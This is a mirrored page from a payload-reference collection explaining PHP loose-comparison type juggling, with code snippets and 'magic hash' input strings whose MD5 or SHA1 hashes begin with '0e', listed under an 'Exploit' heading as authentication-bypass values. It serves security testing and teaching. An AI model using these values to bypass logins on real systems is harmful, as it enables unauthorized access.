Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-14 15:22:51 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/PHP juggling type/README.md
Swissky 2a080f82e6 Cassandra SQL + XSS MD + PHP Type Juggling
2018-09-10 20:40:43 +02:00

1.6 KiB
Raw Blame History

PHP Juggling type and magic hashes

Type Juggling

True statements

var_dump('0010e2' == '1e3');             # true
var_dump('0xABCdef' == ' 0xABCdef');     # true PHP 5.0 / false PHP 7.0
var_dump('0xABCdef' == '     0xABCdef'); # true PHP 5.0 / false PHP 7.0
var_dump('0x01' == 1)                    # true PHP 5.0 / false PHP 7.0
var_dump('0x1234Ab'       == '1193131');

'123'  == 123
'123a' == 123
'abc'  == 0

'' == 0 == false == NULL
'' == 0       # true
0  == false   # true
false == NULL # true
NULL == ''    # true

NULL statements

var_dump(sha1([])); # NULL
var_dump(md5([]));  # NULL

Magic Hashes - Exploit

<?php
var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>
Hash “Magic” Number / String Magic Hash Found By
MD5 240610708 0e462097431906509019562988736854 Michal Spacek
SHA1 10932435112 0e07766915004133176347055865026311692244 Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham

Thanks to